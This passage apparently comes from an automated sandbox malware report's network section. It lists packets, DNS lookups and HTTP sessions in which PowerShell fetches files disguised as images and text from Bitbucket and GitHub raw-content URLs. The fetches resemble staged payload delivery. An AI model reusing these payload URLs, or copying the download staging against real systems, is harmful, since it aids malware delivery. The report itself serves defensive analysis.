                                                                                                      Dec 16, 2024 15:36:24.093933105 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.094000101 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.094019890 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.094063997 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.099423885 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.099452019 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.099526882 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.099544048 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.099587917 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.104074955 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.104132891 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.104171991 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.104187965 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.104207039 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.104229927 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.109724045 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.109747887 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.109819889 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.109837055 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.109882116 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.114805937 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.114828110 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.114902973 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.114917040 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.114959002 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.120474100 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.120496988 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.120568991 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.120585918 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.120625973 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.200788975 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.200819016 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.201071024 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.201100111 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.201159954 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.280930042 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.280961990 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.281085014 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.281157970 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.281224012 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.286336899 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.286366940 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.286449909 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.286467075 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.286528111 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.291888952 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.291913986 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.291987896 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.292004108 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.292054892 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.296780109 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.296804905 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.296885967 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.296900988 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.296961069 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.302237034 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.302267075 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.302347898 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.302362919 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.302426100 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.307928085 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.307951927 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.308037996 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.308053017 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.308111906 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.313208103 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.313235044 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.313314915 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.313349962 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.313513041 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.393371105 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.393399954 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.393539906 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.393609047 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.393681049 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.528316975 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.528383017 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.528434038 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.528525114 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.528568029 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.528592110 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.554095984 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.554155111 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.554209948 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.554234028 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.554261923 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.554280043 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.556736946 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.556782961 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.556821108 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.556833982 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.556863070 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.556936026 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:24.556988955 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:24.557192087 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:28.270607948 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:28.270648003 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:28.270742893 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:28.271050930 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:28.271065950 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:29.849508047 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:29.881131887 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:29.881155968 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.585879087 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.585901976 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.585964918 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.586054087 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:30.586055040 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:30.587622881 CET49728443192.168.2.7185.166.143.50
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 15:36:12.922513008 CET | 63220 | 53 | 192.168.2.7 | 1.1.1.1
Dec 16, 2024 15:36:13.060796022 CET | 53 | 63220 | 1.1.1.1 | 192.168.2.7
Dec 16, 2024 15:36:15.274190903 CET | 62653 | 53 | 192.168.2.7 | 1.1.1.1
Dec 16, 2024 15:36:15.411499023 CET | 53 | 62653 | 1.1.1.1 | 192.168.2.7
Dec 16, 2024 15:36:30.591608047 CET | 60218 | 53 | 192.168.2.7 | 1.1.1.1
Dec 16, 2024 15:36:30.979909897 CET | 53 | 60218 | 1.1.1.1 | 192.168.2.7
Dec 16, 2024 15:36:43.173654079 CET | 49302 | 53 | 192.168.2.7 | 1.1.1.1
Dec 16, 2024 15:36:43.413877964 CET | 53 | 49302 | 1.1.1.1 | 192.168.2.7
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 15:36:12.922513008 CET | 192.168.2.7 | 1.1.1.1 | 0x87ff | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:15.274190903 CET | 192.168.2.7 | 1.1.1.1 | 0xdca8 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.591608047 CET | 192.168.2.7 | 1.1.1.1 | 0xf015 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:43.173654079 CET | 192.168.2.7 | 1.1.1.1 | 0xd39d | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 15:36:13.060796022 CET | 1.1.1.1 | 192.168.2.7 | 0x87ff | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:13.060796022 CET | 1.1.1.1 | 192.168.2.7 | 0x87ff | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:13.060796022 CET | 1.1.1.1 | 192.168.2.7 | 0x87ff | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:15.411499023 CET | 1.1.1.1 | 192.168.2.7 | 0xdca8 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:15.411499023 CET | 1.1.1.1 | 192.168.2.7 | 0xdca8 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:15.411499023 CET | 1.1.1.1 | 192.168.2.7 | 0xdca8 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:15.411499023 CET | 1.1.1.1 | 192.168.2.7 | 0xdca8 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.39.201 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.38 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.66.156 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.74.41 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.159.57 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.107.153 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.119.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:30.979909897 CET | 1.1.1.1 | 192.168.2.7 | 0xf015 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.56 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:43.413877964 CET | 1.1.1.1 | 192.168.2.7 | 0xd39d | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 15:36:43.413877964 CET | 1.1.1.1 | 192.168.2.7 | 0xd39d | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 15:36:43.413877964 CET | 1.1.1.1 | 192.168.2.7 | 0xd39d | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.161.1 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:43.413877964 CET | 1.1.1.1 | 192.168.2.7 | 0xd39d | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.109.43 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:43.413877964 CET | 1.1.1.1 | 192.168.2.7 | 0xd39d | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.70.97 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:43.413877964 CET | 1.1.1.1 | 192.168.2.7 | 0xd39d | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.70.36 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 15:36:43.413877964 CET | 1.1.1.1 | 192.168.2.7 | 0xd39d | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.146.155 | A (IP address) | IN (0x0001) | false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com3.5.12.236A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com3.5.21.64A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com3.5.17.61A (IP address)IN (0x0001)false
                                                                                                      • bitbucket.org
                                                                                                      • raw.githubusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 185.166.143.50 | 443 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:36:14 UTC | 113 | OUT | GET /jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611 HTTP/1.1
                                                                                                      Host: bitbucket.org
                                                                                                      Connection: Keep-Alive
2024-12-16 14:36:15 UTC | 5912 | IN | HTTP/1.1 302 Found
                                                                                                      Date: Mon, 16 Dec 2024 14:36:14 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Content-Length: 0
                                                                                                      Server: AtlassianEdge
                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/2dd18843-1672-4067-bc92-40ec1cff5f15/downloads/cd888b79-d693-4ddd-b0f4-cccbfdae68aa/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BND2LSHFUO&Signature=0vs6WpEuxPI8Y0VWXgHh3hrVZrY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGcaCXVzLWVhc3QtMSJHMEUCIAGhiUETDHij7pVRR66vkrrTXDZC7m5WerB6QQo9wZ%2BaAiEApQYClqL7EW7fZGFOH0qHUizUC6rtt6nkJW8MHZ3S5EYqpwIIMBAAGgw5ODQ1MjUxMDExNDYiDKprY1pTlmyeO%2FcHZyqEAjwUnfqza%2FUgzLtniW3oUrjnmHQCn7YeQ3HKwiYHs1igLQ4G5aRSemc0ZDaU9owsTehmpt1dMKbgJe7sefZwJQwWEAeyz%2FI2bajYXRwrJA7L9fcdUB8VHEmRp1Om7s0lUU8%2BjLwA3REV4%2Bfvm3Mgun2X6EcR4hOSSPC1trIz64qqxcjVpcLlajoqzEO1oZc4qxfWAHz8BmBOirJtrPAfw7oENgJWeMsYdUQ%2BzYPLMa11S3LwWUbHOlNRx0Y6akngvhrmEwHXyKzvpBAE%2FqU%2BQg98T%2FY%2FgBN5pZ4hqHXvcuWoV2XVVgQTXREjjTpqFhEpm1ySYj5tpQrk72KeLgycKEst15eqMJjxgLsGOp0BCf4rtR8ggu3JowBsID37Z1bMdjp0qEYOX%2FsFFEjBNZB7fbhar74EhqZDshs0VVfM420WYwRl8fr85DIvK3zStP%2FmX%2FzBS4p5NgIxY4FeXo1D5yvpTrs4sTc5oPvdE4FIzxnDkQ01Kbb0vno%2 [TRUNCATED]
                                                                                                      Expires: Mon, 16 Dec 2024 14:36:14 GMT
                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                      X-Used-Mesh: False
                                                                                                      Vary: Accept-Language, Origin
                                                                                                      Content-Language: en
                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                      X-Dc-Location: Micros-3
                                                                                                      X-Served-By: 2d23560027d2
                                                                                                      X-Version: 448c766573cd
                                                                                                      X-Static-Version: 448c766573cd
                                                                                                      X-Request-Count: 1694
                                                                                                      X-Render-Time: 0.042084693908691406
                                                                                                      X-B3-Traceid: 562fd8c95cc040d0a59a61dc00874127
                                                                                                      X-B3-Spanid: 717c1c0d2db4617e
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend [TRUNCATED]
                                                                                                      X-Usage-Quota-Remaining: 999192.741
                                                                                                      X-Usage-Request-Cost: 820.03
                                                                                                      X-Usage-User-Time: 0.021510
                                                                                                      X-Usage-System-Time: 0.003091
                                                                                                      X-Usage-Input-Ops: 0
                                                                                                      X-Usage-Output-Ops: 0
                                                                                                      Age: 0
                                                                                                      X-Cache: MISS
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                      Atl-Traceid: 562fd8c95cc040d0a59a61dc00874127
                                                                                                      Atl-Request-Id: 562fd8c9-5cc0-40d0-a59a-61dc00874127
                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                      Server-Timing: atl-edge;dur=155,atl-edge-internal;dur=4,atl-edge-upstream;dur=152,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 185.199.109.133 | 443 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:36:16 UTC | 121 | OUT | GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1
                                                                                                      Host: raw.githubusercontent.com
                                                                                                      Connection: Keep-Alive
2024-12-16 14:36:17 UTC | 889 | IN | HTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      Content-Length: 4697658
                                                                                                      Cache-Control: max-age=300
                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                      Content-Type: image/jpeg
                                                                                                      ETag: "b899cc7aa3319a16e239ba6cb263113b100d6fa7ed0190f683f329a66758220c"
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: deny
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      X-GitHub-Request-Id: 16FD:36817C:12AD50D:14B88E6:67603915
                                                                                                      Accept-Ranges: bytes
                                                                                                      Date: Mon, 16 Dec 2024 14:36:16 GMT
                                                                                                      Via: 1.1 varnish
                                                                                                      X-Served-By: cache-ewr-kewr1740065-EWR
                                                                                                      X-Cache: HIT
                                                                                                      X-Cache-Hits: 0
                                                                                                      X-Timer: S1734359777.925673,VS0,VE68
                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                      X-Fastly-Request-ID: a42c178ab85d9affd5859f2c929638d802fdac02
                                                                                                      Expires: Mon, 16 Dec 2024 14:41:16 GMT
                                                                                                      Source-Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49728 | 185.166.143.50 | 443 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:36:29 UTC | 100 | OUT | GET /eqweqwt/wqeqwfs/downloads/agchIkI.txt HTTP/1.1
                                                                                                      Host: bitbucket.org
                                                                                                      Connection: Keep-Alive
2024-12-16 14:36:30 UTC | 5941 | IN | HTTP/1.1 302 Found
                                                                                                      Date: Mon, 16 Dec 2024 14:36:30 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Content-Length: 0
                                                                                                      Server: AtlassianEdge
                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/84b86a50-0f03-4f00-a68a-9b48f6a9ad1a/downloads/0d99d38f-9760-4bfe-b69f-138f0c1650be/agchIkI.txt?response-content-disposition=attachment%3B%20filename%3D%22agchIkI.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGQDBEIEW&Signature=LcmiqQxfJCWsqR7f5%2FBgA%2FmLfew%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGcaCXVzLWVhc3QtMSJIMEYCIQCkvEaZNiJUzzSwpm6mAojC9AJaLoX0kU%2FJPCVkYw0chQIhAIoEons%2BRUzTqYeijpHGPG88tnHmj5KAOxSTK7%2BPyJj0KqcCCDAQABoMOTg0NTI1MTAxMTQ2Igy7jhdAuU9GksejFp4qhAKh3BYzpW8aypWmyP5uUBqqhpyDnxgY71GJrJTWv9IsNw42rRqC%2BXntF%2FsqDcBXi1AAZfGHedDrd0cTTo0Y267xzy8V9mCp31iPMBDr%2FMq4tto4WLyqglYMhFJuo43Y2IJCaf1ubM1j462lGSOuGBkI%2FCSlgxpFj2ujVf7aLJJSOHhn2Nn%2F1dC%2FdYaMLq6KUpxxtfC24cLCAdjLkqrJN5%2FammuzyXYtSC%2BrIlVCPSj28Krj%2BYfVl103XPiF9br%2Bv9hW6R3El%2FGc9Ss0nw48olzJawrzUs6tWUhxJktgz2%2BHXymxyddxGLgVlzEReUQKkQewD3nBe3cl%2FcGt9JbZnkdk%2FT3FnjC69IC7BjqcAWyv7xb5B4OzYgYtMrKnj%2BRHLyVyFKbWwOZy1hLKKfrqAJc8%2FWcMdTWTyPYIchCHoHcrb3Igc8DTjkE7ELPMqXWcvNdfpqFKHbQ5bq%2FC3cWg4PI86%2BHSCrqH5 [TRUNCATED]
                                                                                                      Expires: Mon, 16 Dec 2024 14:36:30 GMT
                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                      X-Used-Mesh: False
                                                                                                      Vary: Accept-Language, Origin
                                                                                                      Content-Language: en
                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                      X-Dc-Location: Micros-3
                                                                                                      X-Served-By: 7591e08f7aac
                                                                                                      X-Version: 448c766573cd
                                                                                                      X-Static-Version: 448c766573cd
                                                                                                      X-Request-Count: 1928
                                                                                                      X-Render-Time: 0.0749819278717041
                                                                                                      X-B3-Traceid: e87a37688f7b41caafd31e8cd3184821
                                                                                                      X-B3-Spanid: bd907e08c77b91e7
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Security-Policy: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-pa [TRUNCATED]
                                                                                                      X-Usage-Quota-Remaining: 998946.551
                                                                                                      X-Usage-Request-Cost: 1074.93
                                                                                                      X-Usage-User-Time: 0.013970
                                                                                                      X-Usage-System-Time: 0.018278
                                                                                                      X-Usage-Input-Ops: 0
                                                                                                      X-Usage-Output-Ops: 0
                                                                                                      Age: 0
                                                                                                      X-Cache: MISS
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                      Atl-Traceid: e87a37688f7b41caafd31e8cd3184821
                                                                                                      Atl-Request-Id: e87a3768-8f7b-41ca-afd3-1e8cd3184821
                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
